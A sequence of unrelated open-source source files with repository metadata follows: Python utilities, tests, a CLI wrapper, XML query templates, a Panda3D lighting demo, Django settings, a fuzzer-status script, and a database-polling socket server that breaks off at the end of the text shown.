0372fae3ea1b5eb2527a825a9ca4ed488c4356f6
|
dcce56815dca2b18039e392053376636505ce672
|
/dumpscripts/urllib_parse_parse_qs.py
|
ac161429c77b20833f8c030beec791aacc03a8ed
|
[] |
no_license
|
robertopauletto/PyMOTW-it_3.0
|
28ff05d8aeccd61ade7d4107a971d9d2576fb579
|
c725df4a2aa2e799a969e90c64898f08b7eaad7d
|
refs/heads/master
| 2021-01-20T18:51:30.512327
| 2020-01-09T19:30:14
| 2020-01-09T19:30:14
| 63,536,756
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 184
|
py
|
# urllib_parse_parse_qs.py
from urllib.parse import parse_qs, parse_qsl

# A query string with a repeated parameter name: parse_qs groups the values
# under one key, parse_qsl keeps one (name, value) pair per occurrence.
encoded = 'foo=foo1&foo=foo2'
for label, parser in (('parse_qs ', parse_qs), ('parse_qsl', parse_qsl)):
    print(label + ':', parser(encoded))
|
[
"roberto.pauletto@gmail.com"
] |
roberto.pauletto@gmail.com
|
51240397ecfcb413842739d74156a0b5203fe35a
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/PostenMapping/Model/Post050403123.py
|
d2a98778acbe6ecbe359b1c4d49180ede0abb679
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,021
|
py
|
# coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post050403123(StandaardPost):
    """Standard tender item 0504.03123: type-I crushed-stone foundation, 23 cm thick.

    Generated data class: it only configures the StandaardPost base with the
    item number, description, unit (m2) and its four attribute mappings.
    """
    def __init__(self):
        super().__init__(
            nummer='0504.03123',
            beschrijving='Steenslagfundering met continue korrelverdeling zonder toevoegsels, type I volgens 5-4.3, dikte 23 cm',
            meetstaateenheid='M2',
            # Mapping 1: fixed foundation type on the Onderbouw asset.
            mappings=[StandaardPostMapping(
                typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
                attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw.type',
                dotnotation='type',
                defaultWaarde='steenslag-met-continue-korrelverdeling-zonder-toevoegsel---type-I',
                range='',
                usagenote='',
                isMeetstaatAttr=0,
                isAltijdInTeVullen=0,
                isBasisMapping=1,
                mappingStatus='gemapt 2.0',
                mappingOpmerking='',
                standaardpostnummer='0504.03123')
            # Mapping 2: the layer's role is "fundering" (foundation).
            , StandaardPostMapping(
                typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
                attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.laagRol',
                dotnotation='laagRol',
                defaultWaarde='fundering',
                range='',
                usagenote='',
                isMeetstaatAttr=0,
                isAltijdInTeVullen=0,
                isBasisMapping=1,
                mappingStatus='gemapt 2.0',
                mappingOpmerking='',
                standaardpostnummer='0504.03123')
            # Mapping 3: fixed layer thickness of 23 cm.
            , StandaardPostMapping(
                typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
                attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#LaagDikte.dikte',
                dotnotation='dikte',
                defaultWaarde='23',
                range='',
                usagenote='cm^^cdt:ucumunit',
                isMeetstaatAttr=0,
                isAltijdInTeVullen=0,
                isBasisMapping=1,
                mappingStatus='gemapt 2.0',
                mappingOpmerking='',
                standaardpostnummer='0504.03123')
            # Mapping 4: surface area in m2 — the only bill-of-quantities
            # attribute (isMeetstaatAttr=1) and always to be filled in.
            , StandaardPostMapping(
                typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
                attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.oppervlakte',
                dotnotation='oppervlakte',
                defaultWaarde='',
                range='',
                usagenote='m2^^cdt:ucumunit',
                isMeetstaatAttr=1,
                isAltijdInTeVullen=1,
                isBasisMapping=1,
                mappingStatus='gemapt 2.0',
                mappingOpmerking='',
                standaardpostnummer='0504.03123')])
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
eb8d813a61a828c9efb6c8ec52af1b6ef4a5c794
|
91824d746654fe12881b4fc3b55c553aae0d22ac
|
/py/redundant-connection.py
|
ab5fad839fdb7996e843187b4f2991bc9032bb7b
|
[
"Apache-2.0"
] |
permissive
|
ckclark/leetcode
|
a1a173c67a36a3256b198f853fcd3d15aa5abbb7
|
844c6f18d06dcb397db76436e5f4b8ddcb1beddc
|
refs/heads/master
| 2021-01-15T08:14:43.368516
| 2020-02-14T07:25:05
| 2020-02-14T07:30:10
| 42,386,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
from collections import defaultdict
class Solution(object):
    def findRedundantConnection(self, edges):
        """Return the edge whose removal turns the graph back into a tree.

        The input is a tree plus exactly one extra edge, so the graph
        contains a single cycle.  Among the edges on that cycle, the one
        that appears LAST in the input is returned (LeetCode 684 rule).

        :type edges: List[List[int]]
        :rtype: List[int]
        """
        visited = set()
        parent = dict()
        neighbors = defaultdict(list)
        # Input position of each undirected edge, keyed by sorted endpoints.
        edge_idx = {tuple(sorted(e)): i for i, e in enumerate(edges)}

        def cycle_edge(v1, v2):
            # The back edge (v1, v2) closes the cycle; walk the DFS parent
            # chain from v1 back to v2 and return the cycle edge with the
            # largest input index.
            e = tuple(sorted([v1, v2]))
            max_idx, ans = edge_idx[e], e
            v = v1
            while v != v2:
                e = tuple(sorted([v, parent[v]]))
                if edge_idx[e] > max_idx:
                    max_idx = edge_idx[e]
                    ans = e
                v = parent[v]
            return list(ans)

        def dfs(cur):
            visited.add(cur)
            for neighbor in neighbors[cur]:
                if neighbor != parent[cur]:
                    if neighbor in visited:
                        # Revisiting a node means we found the back edge.
                        yield cycle_edge(cur, neighbor)
                    else:
                        parent[neighbor] = cur
                        # Idiom fix: delegate to the sub-generator directly
                        # instead of the manual "for x in ...: yield x" loop.
                        yield from dfs(neighbor)

        for v1, v2 in edges:
            neighbors[v1].append(v2)
            neighbors[v2].append(v1)
            parent[v1] = -1
        # Start the search from the last edge's first endpoint; the graph is
        # connected, so the DFS reaches the cycle from any start node.
        return next(dfs(v1))
|
[
"clark.ck@gmail.com"
] |
clark.ck@gmail.com
|
43c894cedddac6fcbb06773d61b19cb93d4bf03c
|
2a8c18a9fd129337c043fd2363b48450f0c3185f
|
/test/gst-msdk/transcode/vc1.py
|
7e4155599e586463311c20b1dd91b128b51208b1
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
intel/vaapi-fits
|
9641af9d684a7643c18c7f95e9411b807b2a3ae1
|
a60be1833b408fee665d0f717a10804ac2fb8ed4
|
refs/heads/master
| 2023-09-03T01:15:21.981271
| 2023-08-25T18:33:26
| 2023-09-01T14:05:15
| 164,735,279
| 26
| 34
|
BSD-3-Clause
| 2023-09-14T11:10:49
| 2019-01-08T21:24:18
|
Python
|
UTF-8
|
Python
| false
| false
| 515
|
py
|
##
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ....lib.gstreamer.msdk.util import *
from ....lib.gstreamer.msdk.transcoder import TranscoderTest
spec = load_test_spec("vc1", "transcode")
class default(TranscoderTest):
  @slash.parametrize(("case"), sorted_by_resolution(spec))
  def test(self, case):
    # Seed the test instance with the spec entry for this case, then pin
    # the case name and codec before running the transcode.
    params = spec[case].copy()
    params.update(case = case, codec = "vc1")
    vars(self).update(params)
    self.transcode()
|
[
"ullysses.a.eoff@intel.com"
] |
ullysses.a.eoff@intel.com
|
7c0227292f7dfe64bf7c5b85a67c03683090503b
|
b15d2787a1eeb56dfa700480364337216d2b1eb9
|
/samples/cli/accelbyte_py_sdk_cli/platform/_create_user_payment_order.py
|
c36e358769fc38c7aedebc890ffc637ee047d686
|
[
"MIT"
] |
permissive
|
AccelByte/accelbyte-python-sdk
|
dedf3b8a592beef5fcf86b4245678ee3277f953d
|
539c617c7e6938892fa49f95585b2a45c97a59e0
|
refs/heads/main
| 2023-08-24T14:38:04.370340
| 2023-08-22T01:08:03
| 2023-08-22T01:08:03
| 410,735,805
| 2
| 1
|
MIT
| 2022-08-02T03:54:11
| 2021-09-27T04:00:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,810
|
py
|
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template_file: python-cli-command.j2
# AGS Platform Service (4.32.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
import json
import yaml
from typing import Optional
import click
from .._utils import login_as as login_as_internal
from .._utils import to_dict
from accelbyte_py_sdk.api.platform import (
create_user_payment_order as create_user_payment_order_internal,
)
from accelbyte_py_sdk.api.platform.models import ErrorEntity
from accelbyte_py_sdk.api.platform.models import PaymentOrderCreate
from accelbyte_py_sdk.api.platform.models import PaymentOrderInfo
from accelbyte_py_sdk.api.platform.models import ValidationErrorEntity
# CLI wrapper for the generated createUserPaymentOrder platform API call.
# Prints the operation's docstring with --doc, otherwise authenticates,
# parses --body as JSON into a PaymentOrderCreate, invokes the API and
# dumps the result as YAML.
@click.command()
@click.argument("user_id", type=str)
@click.option("--body", "body", type=str)
@click.option("--namespace", type=str)
@click.option("--login_as", type=click.Choice(["client", "user"], case_sensitive=False))
@click.option("--login_with_auth", type=str)
@click.option("--doc", type=bool)
def create_user_payment_order(
    user_id: str,
    body: Optional[str] = None,
    namespace: Optional[str] = None,
    login_as: Optional[str] = None,
    login_with_auth: Optional[str] = None,
    doc: Optional[bool] = None,
):
    # --doc short-circuits: show the wrapped operation's help and exit.
    if doc:
        click.echo(create_user_payment_order_internal.__doc__)
        return
    # Either reuse an explicit Authorization header or perform a login.
    x_additional_headers = None
    if login_with_auth:
        x_additional_headers = {"Authorization": login_with_auth}
    else:
        login_as_internal(login_as)
    # --body is a JSON string; convert it to the request model up front so
    # malformed input fails before the network call.
    if body is not None:
        try:
            body_json = json.loads(body)
            body = PaymentOrderCreate.create_from_dict(body_json)
        except ValueError as e:
            raise Exception(f"Invalid JSON for 'body'. {str(e)}") from e
    result, error = create_user_payment_order_internal(
        user_id=user_id,
        body=body,
        namespace=namespace,
        x_additional_headers=x_additional_headers,
    )
    if error:
        raise Exception(f"createUserPaymentOrder failed: {str(error)}")
    click.echo(yaml.safe_dump(to_dict(result), sort_keys=False))


# Metadata consumed by the CLI framework's command registry.
create_user_payment_order.operation_id = "createUserPaymentOrder"
create_user_payment_order.is_deprecated = False
|
[
"elmernocon@gmail.com"
] |
elmernocon@gmail.com
|
b08feec8aa0ebf1c8e0ffc71a57504ca08bfc238
|
b550eda62179ffd8e49a59df7f8a30163140204f
|
/backend/openshift/services/data/data/dependencies/xml_templates.py
|
c3e9ee5b62ab44ae3a4c242f93e504762286d3bc
|
[
"Apache-2.0"
] |
permissive
|
bgoesswe/openeo-repeatability
|
6222fb235b70fda9da998b63fec92c0e5ac07169
|
087b9965e710d16cd6f29cb25e2cb94e443c2b30
|
refs/heads/master
| 2022-12-11T03:43:35.365574
| 2018-08-07T20:02:02
| 2018-08-07T20:02:02
| 139,158,921
| 0
| 1
| null | 2022-12-08T02:15:15
| 2018-06-29T14:27:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,291
|
py
|
# Envelope for a paged CSW 2.0.2 GetRecords query.  Format placeholders:
# {start_position} (paging offset), {output_schema}, and {children} — the
# predicate XML (from the templates below) inserted inside <ogc:Filter>.
# Results are sorted ascending by dc:date.
xml_base = (
    "<?xml version='1.0' encoding='ISO-8859-1' standalone='no'?>"
    "<csw:GetRecords "
    "xmlns:csw='http://www.opengis.net/cat/csw/2.0.2' "
    "xmlns:ogc='http://www.opengis.net/ogc' "
    "service='CSW' "
    "version='2.0.2' "
    "resultType='results' "
    "startPosition='{start_position}' "
    "maxRecords='1000' "
    "outputFormat='application/json' "
    "outputSchema='{output_schema}' "
    "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' "
    "xsi:schemaLocation='http://www.opengis.net/cat/csw/2.0.2 http://schemas.opengis.net/csw/2.0.2/CSW-discovery.xsd' "
    "xmlns:gml='http://www.opengis.net/gml' "
    "xmlns:gmd='http://www.isotc211.org/2005/gmd' "
    "xmlns:apiso='http://www.opengis.net/cat/csw/apiso/1.0'>"
    "<csw:Query typeNames='csw:Record'>"
    "<csw:ElementSetName>full</csw:ElementSetName>"
    "<csw:Constraint version='1.1.0'>"
    "<ogc:Filter>"
    "{children}"
    "</ogc:Filter>"
    "</csw:Constraint>"
    "<ogc:SortBy>"
    "<ogc:SortProperty>"
    "<ogc:PropertyName>dc:date</ogc:PropertyName>"
    "<ogc:SortOrder>ASC</ogc:SortOrder>"
    "</ogc:SortProperty>"
    "</ogc:SortBy>"
    "</csw:Query>"
    "</csw:GetRecords>")

# Combines multiple predicate fragments with a logical AND.
xml_and = (
    "<ogc:And>"
    "{children}"
    "</ogc:And>")

# Predicate: the record type is "series" (dataset series, not single items).
xml_series = (
    "<ogc:PropertyIsEqualTo>"
    "<ogc:PropertyName>apiso:Type</ogc:PropertyName>"
    "<ogc:Literal>series</ogc:Literal>"
    "</ogc:PropertyIsEqualTo>")

# Predicate: the given {property} equals the given {product} identifier.
xml_product = (
    "<ogc:PropertyIsEqualTo>"
    "<ogc:PropertyName>{property}</ogc:PropertyName>"
    "<ogc:Literal>{product}</ogc:Literal>"
    "</ogc:PropertyIsEqualTo>")

# Predicate: temporal extent starts at or after {start}.
xml_begin = (
    "<ogc:PropertyIsGreaterThanOrEqualTo>"
    "<ogc:PropertyName>apiso:TempExtent_begin</ogc:PropertyName>"
    "<ogc:Literal>{start}</ogc:Literal>"
    "</ogc:PropertyIsGreaterThanOrEqualTo>")

# Predicate: temporal extent ends at or before {end}.
xml_end = (
    "<ogc:PropertyIsLessThanOrEqualTo>"
    "<ogc:PropertyName>apiso:TempExtent_end</ogc:PropertyName>"
    "<ogc:Literal>{end}</ogc:Literal>"
    "</ogc:PropertyIsLessThanOrEqualTo>")

# Predicate: the record's bounding box intersects the envelope spanned by
# the bbox object's (x1, y1)-(x2, y2) corners.
xml_bbox = (
    "<ogc:BBOX>"
    "<ogc:PropertyName>ows:BoundingBox</ogc:PropertyName>"
    "<gml:Envelope>"
    "<gml:lowerCorner>{bbox.x1} {bbox.y1}</gml:lowerCorner>"
    "<gml:upperCorner>{bbox.x2} {bbox.y2}</gml:upperCorner>"
    "</gml:Envelope>"
    "</ogc:BBOX>")
|
[
"bernhard.goesswein@geo.tuwien.ac.at"
] |
bernhard.goesswein@geo.tuwien.ac.at
|
8630e43fdef88303ac3890a023c2a9d9ba234303
|
f062af64ce156719203b79de9c2502b265af27de
|
/tensorflow_datasets/image_classification/imagenet2012_fewshot.py
|
8ceb0f003db906d5f9ee337a88de732cb52626d6
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/datasets
|
d0c58f3db7ce06347671558b9e5a41e12e6913ce
|
41ae3cf1439711ed2f50f99caa0e6702082e6d37
|
refs/heads/master
| 2023-08-31T03:23:16.581638
| 2023-08-30T17:25:34
| 2023-08-30T17:29:38
| 148,221,325
| 4,224
| 1,738
|
Apache-2.0
| 2023-09-14T14:04:22
| 2018-09-10T21:27:22
|
Python
|
UTF-8
|
Python
| false
| false
| 938
|
py
|
# coding=utf-8
# Copyright 2023 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dataset definition for imagenet2012_fewshot.
DEPRECATED!
If you want to use the Imagenet2012Fewshot dataset builder class, use:
tfds.builder_cls('imagenet2012_fewshot')
"""
from tensorflow_datasets.core import lazy_builder_import

# Deprecated alias kept for backward compatibility: resolves the real
# builder class lazily on first use instead of importing it eagerly.
Imagenet2012Fewshot = lazy_builder_import.LazyBuilderImport(
    'imagenet2012_fewshot'
)
|
[
"no-reply@google.com"
] |
no-reply@google.com
|
c6f1362845b8706526e3c4be24be5c5c66831c22
|
2a0865c583a12c66fdd1e7a62535b3e35482d37b
|
/CarAI/joshua_work/old/tutorial/Code/04_code/Lights/src/Application.py
|
cd596a8094bb301022e4217d73fa06d9531e57e5
|
[] |
no_license
|
MyAusweis/UnrealAI
|
fe4a6df2859143cd4ca66a063016fc4d22d62bb7
|
9e5ad6b93df7ecf2293de10d41f09969c42404b3
|
refs/heads/master
| 2022-02-11T12:43:52.129313
| 2018-07-01T22:08:23
| 2018-07-01T22:08:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,520
|
py
|
from direct.showbase.ShowBase import ShowBase
from direct.actor.Actor import Actor
from panda3d.core import *
class Application(ShowBase):
    """Panda3D demo scene: a walking panda on a ground plane, lit by
    ambient, directional, point and shadow-casting spot lights."""

    def __init__(self):
        ShowBase.__init__(self)

        # Animated actor looping its walk cycle.
        self.panda = Actor("panda", {"walk": "panda-walk"})
        self.panda.reparentTo(render)
        self.panda.loop("walk")

        # 20x20 ground card, pitched to lie horizontally.
        card_maker = CardMaker("plane")
        card_maker.setFrame(-10, 10, -10, 10)
        ground = render.attachNewNode(card_maker.generate())
        ground.setP(270)

        self.cam.setPos(0, -40, 6)

        # Dim reddish ambient fill applied to the whole scene.
        ambient = AmbientLight("ambient")
        ambient.setColor(Vec4(0.2, 0.1, 0.1, 1.0))
        render.setLight(render.attachNewNode(ambient))

        # Greenish directional light.
        directional = DirectionalLight("directional")
        directional.setColor(Vec4(0.1, 0.4, 0.1, 1.0))
        directional_np = render.attachNewNode(directional)
        directional_np.setHpr(60, 0, 90)
        render.setLight(directional_np)

        # Bright point light above the scene, lighting only the panda.
        point = PointLight("point")
        point.setColor(Vec4(0.8, 0.8, 0.8, 1.0))
        point_np = render.attachNewNode(point)
        point_np.setPos(0, 0, 15)
        self.panda.setLight(point_np)

        # Red shadow-casting spotlight aimed at the panda.
        spot = Spotlight("spot")
        spot.setLens(PerspectiveLens())
        spot.setColor(Vec4(1.0, 0.0, 0.0, 1.0))
        spot.setShadowCaster(True)
        spot_np = render.attachNewNode(spot)
        spot_np.setPos(-10, -10, 20)
        spot_np.lookAt(self.panda)
        render.setLight(spot_np)

        # Enable the automatic shader generator so shadows work.
        render.setShaderAuto()
|
[
"joshualevy44@berkeley.edu"
] |
joshualevy44@berkeley.edu
|
79dbda9c85e5d684dfa0a8d30200484398c05def
|
c83473c2f9b63429f40e8a4806ab49305815c81d
|
/feature_cross_script/feature_cross_run.py
|
ba39e49faa933a1e1c10cfa9a816e7e26ae97afd
|
[] |
no_license
|
pelinbalci/machinelearning
|
f8f84cda07a2ae87f23598188a6c148badb6e15f
|
33e9786ea49f114c24c02dbf24e33434d0421f65
|
refs/heads/master
| 2022-11-15T19:55:46.633659
| 2020-07-05T18:38:54
| 2020-07-05T18:38:54
| 273,779,533
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,798
|
py
|
from feature_cross_script.feature_cross import import_dataset, scale_label, shuffle_df, create_model, train_model, \
    plot_the_loss_curve, create_feature_columns, create_feature_layer, create_bucket_features, create_crossed_feature,\
    evaluate_model
from parameters import learning_rate, epochs, batch_size, label_name, resolution_in_degrees

# NOTE(review): absolute user-specific paths — adjust before running elsewhere.
test_path = '/Users/pelin.balci/PycharmProjects/machinelearning/inputs/california_housing_test.csv'
train_path = '/Users/pelin.balci/PycharmProjects/machinelearning/inputs/california_housing_train.csv'

# Load and prepare both splits: scale the label column, then shuffle train.
train_df = import_dataset(train_path)
test_df = import_dataset(test_path)

train_df = scale_label(train_df)
test_df = scale_label(test_df)

shuffled_train_df = shuffle_df(train_df)

# Representation 1: raw floating-point latitude/longitude feature columns.
# Use floating latitude ang longitude vectors seperately:
feature_columns = create_feature_columns()
fp_feature_layer = create_feature_layer(feature_columns)

# Representation 2: bucketized latitude/longitude (still two separate vectors).
# Bucketize them intp 10 integer points, we still have two separate vectors:
feature_columns, buckets_feature_layer = create_bucket_features(train_df, resolution_in_degrees)
''' Bucket representation outperformed floating-point representations. '''

# Representation 3: feature cross of the bucketized latitude x longitude.
# In real life we have two dimension vectors for latitude and longitude, cross them:
feature_cross_feature_layer = create_crossed_feature(feature_columns)
''' Representing these features as a feature cross produced much lower loss values than
representing these features as buckets'''

# Create and compile the model's topography.
my_model = create_model(learning_rate, feature_cross_feature_layer)

# Train the model on the training set.
epochs, rmse = train_model(my_model, train_df, epochs, batch_size, label_name)

plot_the_loss_curve(epochs, rmse)

evaluation_test_result = evaluate_model(my_model, test_df, label_name, batch_size)

print('done')
|
[
"balci.pelin@gmail.com"
] |
balci.pelin@gmail.com
|
22c64eb6e9eab3d47ae40216f2afd52aa7f58a5a
|
1000884faf988644d9abe02525c885307fd36f98
|
/day17/about_md/about_md/settings.py
|
d507ca2e1f90a0399406b7229861aae74f267488
|
[
"MIT"
] |
permissive
|
gengna92/PythonProjects
|
e6f88eb36f636420fbede8e204490c0b3e4c24fc
|
12d223eb1ec8f90992ea87df79f10ea8c745c4cb
|
refs/heads/master
| 2021-08-27T20:48:26.675942
| 2021-08-14T06:59:34
| 2021-08-14T06:59:34
| 166,172,714
| 0
| 0
|
MIT
| 2021-08-14T07:00:08
| 2019-01-17T06:28:52
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,263
|
py
|
"""
Django settings for about_md project.
Generated by 'django-admin startproject' using Django 1.11.20.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o)btb@#(-2p*my0wc^qa#zj5uj)tf0$6-ox323m)*t3=(5+2ne'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Project app, registered through its AppConfig subclass.
    'app01.apps.App01Config',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    # Custom demo middlewares appended after Django's stock stack.
    'app01.my_middleware.middlewares.MD1',
    'app01.my_middleware.middlewares.MD2',
]
ROOT_URLCONF = 'about_md.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'about_md.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
[
"gengna@new4g.cn"
] |
gengna@new4g.cn
|
f8eccd51f10bf0fadf99e4d474c60d6a0231a31e
|
a782e8b77eb9a32ffb2c3f417125553693eaee86
|
/scripts/fuzzing/check_fuzzer.py
|
bcb62977c4837b69f26a61f593dc9e38d7478b1d
|
[
"BSD-3-Clause"
] |
permissive
|
xyuan/fuchsia
|
9e5251517e88447d3e4df12cf530d2c3068af290
|
db9b631cda844d7f1a1b18cefed832a66f46d56c
|
refs/heads/master
| 2022-06-30T17:53:09.241350
| 2020-05-13T12:28:17
| 2020-05-13T12:28:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,737
|
py
|
#!/usr/bin/env python2.7
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import sys
from lib.args import ArgParser
from lib.device import Device
from lib.fuzzer import Fuzzer
from lib.host import Host
def main():
    """Print status for fuzzers matching NAME, or for all running fuzzers.

    For each reported fuzzer the execution state (RUNNING/STOPPED), output
    path, corpus size and artifact list are printed.

    Returns:
        0 if at least one fuzzer was reported; 1 if nothing is running and
        no name was given.
    """
    parser = ArgParser(
        'Reports status for the fuzzer matching NAME if ' +
        'provided, or for all running fuzzers. Status includes execution ' +
        'state, corpus size, and number of artifacts.')
    parser.require_name(False)
    args = parser.parse_args()
    host = Host.from_build()
    device = Device.from_args(host, args)
    fuzzers = Fuzzer.filter(host.fuzzers, args.name)
    pids = device.getpids()
    silent = True
    for pkg, tgt in fuzzers:
        fuzzer = Fuzzer(device, pkg, tgt)
        # Without an explicit name, only report fuzzers that are running.
        if not args.name and tgt not in pids:
            continue
        silent = False
        if tgt in pids:
            print(str(fuzzer) + ': RUNNING')
        else:
            print(str(fuzzer) + ': STOPPED')
        print('  Output path: ' + fuzzer.data_path())
        print(
            '  Corpus size: %d inputs / %d bytes' % fuzzer.measure_corpus())
        artifacts = fuzzer.list_artifacts()
        # Idiom fix: truthiness test instead of len(...) == 0.
        if not artifacts:
            print('  Artifacts: None')
        else:
            print('  Artifacts: ' + artifacts[0])
            for artifact in artifacts[1:]:
                print(' ' + artifact)
    if silent:
        print(
            'No fuzzers are running. Include \'name\' to check specific ' +
            'fuzzers.')
        return 1
    return 0
if __name__ == '__main__':
sys.exit(main())
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
fb5988d10e71565e8e3ad8c771429b17c9cbe261
|
16fa36449c5b7843923ab40fe37e0563b0f811cf
|
/r05.py
|
fe6bda675e4ac8d9443bddda2d5ecdb8a5937750
|
[
"Apache-2.0"
] |
permissive
|
netlabcode/reader
|
1d34787c3d619af4d28c08f989e8c0976f18773a
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
refs/heads/main
| 2023-04-17T08:45:15.397981
| 2021-05-06T05:09:10
| 2021-05-06T05:09:10
| 354,858,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,139
|
py
|
import psycopg2
from datetime import datetime
import binascii
import _thread
import time
import socket
PORT1 = 8805
# (object id in the "objects" table, merge-unit prefix used on the wire).
# Order and prefixes match the original per-id polling sequence, ids 34..41.
_ID_PREFIXES = [
    (34, "mu01"),
    (35, "mu01"),
    (36, "mu02"),
    (37, "mu02"),
    (38, "mu02"),
    (39, "mu05"),
    (40, "mu03"),
    (41, "mu03"),
]


def _fetch(cursor, column, obj_id):
    """Read one column of one row of the objects table.

    ``column`` and ``obj_id`` only ever come from the constant table above,
    so building the SQL with string formatting is safe here.
    """
    cursor.execute("SELECT %s from objects WHERE id=%d" % (column, obj_id))
    return cursor.fetchone()[0]


def serverX():
    """Serve one TCP client at a time on PORT1, streaming DB value changes.

    On connect, the current ``value`` and ``code`` of every object id in
    _ID_PREFIXES are read once.  The loop then polls once per second and
    sends "<prefix>_<code>+<value>" for each id whose value changed,
    followed by a keep-alive byte b"a".  When the client drops or a query
    fails, the session is closed and the server waits for the next client.

    Fixes over the original: the restart was implemented as unbounded
    recursion (serverX() calling itself), which would eventually exhaust
    the recursion limit — replaced with a loop; the 8 copy-pasted per-id
    poll blocks are table-driven; the bare ``except:`` now catches only
    ``Exception``.  The mismatched "Substation 5"/"Substation 6" log
    strings are preserved as-is.
    """
    while True:
